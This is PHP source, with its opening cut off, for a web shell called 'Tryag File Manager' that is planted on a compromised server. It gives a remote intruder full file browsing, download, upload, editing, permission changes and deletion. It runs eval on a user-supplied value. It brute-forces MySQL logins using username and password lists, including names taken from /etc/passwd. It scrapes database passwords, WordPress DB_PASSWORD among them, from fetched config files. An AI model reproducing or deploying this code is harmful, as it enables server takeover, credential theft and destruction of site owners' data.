$value){ $_POST[$key] = stripslashes($value); } } $_POST['path'] = (isset($_POST['path'])) ? g22b_crypt($_POST['path'],'de') : false; $_POST['name'] = (isset($_POST['name'])) ? g22b_crypt($_POST['name'],'de') : false; if(isset($_GET['option']) && $_POST['opt'] == 'download'){ header('Content-type: text/plain'); header('Content-Disposition: attachment; filename="'.$_POST['name'].'"'); echo(file_get_contents($_POST['path'])); exit(); } echo ' Tryag File Manager
'; if(isset($_GET['cpanel'])){ if(isset($_POST['usernames']) && isset($_POST['passwords'])){ $usernames = base64_decode($_POST['usernames']); $passwords = base64_decode($_POST['passwords']); $count = 0; foreach(explode("\n",$usernames) as $username){ $username = ($_POST['type'] == 'simple') ? $username : passwdtouser($username); foreach(explode("\n",$passwords) as $password){ $username = trim($username); $password = trim($password); $co = mysql_connect('localhost',$username,$password); if($co){ mysql_close($co); echo "Tryag~ Username ($username) Password ($password)
"; $count++; } } } echo "$count Usernames Founded."; }else{ echo '
Usernames :

Passwords :

Usernames Type : Simple : - /etc/passwd :
'; } }elseif(isset($_GET['cpanelconf'])){ if(isset($_POST['link'])){ if(file_get_contents($_POST['link'])){ $count = 0; foreach(get_data($_POST['link']) as $info){ $co = mysql_connect('localhost',$info[0],$info[1]); if($co){ echo "Tryag~ Username ($info[0]) Password ($info[1])
"; mysql_close($co); } } }else{ echo "Invalid Link Try Again."; } } echo '
Configs Link :
'; }else{ if(isset($_GET['filesrc'])){ $file = g22b_crypt($_GET['filesrc'],'de'); echo '
'.htmlspecialchars($file).'
'; }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete' || (isset($_GET['new']) && $_POST['type'] == 'file')){ echo '
'.$_POST['name'].'
'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ eval('$perm = '.$_POST['perm'].';'); if(chmod($_POST['path'],$perm)){ echo 'Change Permission Done.
'; $permdone = true; }else{ echo 'Change Permission Error.
'; } } if($permdone){ $perm = $_POST['perm']; }else{ $perm = substr(sprintf('%o', fileperms($_POST['path'])), -4); } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$currentpath.'/'.$_POST['newname'])){ echo 'Change Name Done.
'; $_POST['name'] = $_POST['newname']; }else{ echo 'Change Name Error.
'; } } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit' || isset($_GET['new'])){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,base64_decode($_POST['src']))){ echo 'Edit File Done.
'; $done = true; }else{ echo 'Edit File Error.
'; } fclose($fp); } if(isset($_GET['new']) && !$done){ $filecontent = ''; $_POST['path'] = "$currentpath/$_POST[name]"; }else{ $filecontent = filesrc($_POST['path']); } echo '

'; } echo '
'; }else{ echo '
'; if($_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Delete Dir Done.
'; }else{ echo 'Delete Dir Error.
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Delete File Done.
'; }else{ echo 'Delete File Error.
'; } } }elseif($_POST['type'] == 'dir' && isset($_GET['new'])){ if(mkdir("$currentpath/$_POST[name]")){ echo 'Create Dir Done.
'; }else{ echo 'Create Dir Error.
'; } }elseif(isset($_FILES['file'])){ $userfile_name = $currentpath.'/'.$_FILES['file']['name']; $userfile_tmp = $_FILES['file']['tmp_name']; if(move_uploaded_file($userfile_tmp,$userfile_name)){ echo 'File Upload Done.
'; }else{ echo 'File Upload Error.
'; } } echo '
'; $dirs = getfiles('dir'); foreach($dirs as $dir){ echo '
'; } echo ''; $files = getfiles('file'); foreach($files as $file){ echo '
'; } echo '
Name Size Permissions Options
'.$dir['name'].'
'.$dir['size'].' '.$dir['perm'].'
'.$file['name'].'
'.$file['size'].' '.$file['perm'].'
'; } } echo ' '; function getfiles($type){ global $currentpath; $dir = scandir($currentpath); $result = array(); foreach($dir as $file){ $current['fullname'] = "$currentpath/$file"; if($type == 'dir'){ if(!is_dir($current['fullname']) || $file == '.' || $file == '..') continue; }elseif($type == 'file'){ if(!is_file($current['fullname'])) continue; } $current['name'] = $file; $current['link'] = g22b_crypt($current['fullname'],'en'); $current['size'] = (is_dir($current['fullname'])) ? '--' : file_size($current['fullname']); $current['perm'] = perms($current['fullname']); if(is_writable($current['fullname'])){ $current['permcolor'] = 'green'; }elseif(is_readable($current['fullname'])){ $current['permcolor'] = ''; }else{ $current['permcolor'] = 'red'; } $result[] = $current; } return $result; } function start(){ global $_POST,$_GET; $result['currentpath'] = (isset($_GET['path'])) ? g22b_crypt($_GET['path'],'de') : cwd(); $result['currentpathen'] = (isset($_GET['path'])) ? $_GET['path'] : g22b_crypt(cwd(),'en'); return $result; } function file_size($file){ $size = filesize($file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } return $size; } function g22b_crypt($txt,$type){ if(function_exists('base64_encode') && function_exists('base64_decode')){ return ($type == 'en') ? base64_encode($txt) : base64_decode($txt); }elseif(function_exists('strlen') && function_exists('dechex') && function_exists('ord') && function_exists('chr') && function_exists('hexdec')){ return ($type == 'en') ? strToHex($txt) : hexToStr($txt); }else{ $ar1 = array('public_html','.htaccess','/','.'); $ar2 = array('bbbpubghostbbb','bbbhtaghostbbb','bbbsghostbbb','bbbdotghostbbb'); return ($type == 'en') ? str_replace($ar1,$ar2,$txt) : str_replace($ar2,$ar1,$txt); } } function strToHex($string){ $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } function hexToStr($hex){ $string=''; for ($i=0; $i < strlen($hex)-1; $i+=2) { $string .= chr(hexdec($hex[$i].$hex[$i+1])); } return $string; } function nav_link(){ global $currentpath; $path = $currentpath; $path = str_replace('\\','/',$path); $paths = explode('/',$path); $result = ''; foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; $result .= '/'; continue; } if($pat == '') continue; $result .= '/'; } return $result; } function filesrc($file){ return htmlspecialchars(file_get_contents($file)); } function cwd(){ if(function_exists('getcwd')){ return getcwd(); }else{ $e = str_replace("\\","/",$path); $e = explode('/',$path); $result = ''; for($i=0;$i',$file); $file = trim($file[0]); if(!eregi('.txt',$file)) continue; $src = file_get_contents("$url/$file"); if(!$src) continue; $user = str_replace($ar,'',$file); $user = str_replace($ar,'',$user.'.txt'); $user = str_replace($ar,'',$user.'.txt'); $user = trim(str_replace('.txt','',$user)); if(eregi("WordPress",$src)){ $pass = ex("define('DB_PASSWORD', '","');",$src); $data[] = array($user,$pass); }else{ $tokens = token_get_all($src); foreach($tokens as $token){ if(!$token[1]) continue; $tokenname = token_name($token[0]); if($tokenname != 'T_VARIABLE') continue; $var = $token[1]; if(eregi('pass',$var)){ $f = str_replace(' ','',ex($var,';',$src)); $a = trim(ex("='","'",$f)); $b = trim(ex('"','"',$f)); if($a != ''){ $pass = $a; }elseif($b != ''){ $pass = $b; } if($pass == '') continue; $data[] = array($user,$pass); } } } } return $data; } function perms($file){ $perms = @fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>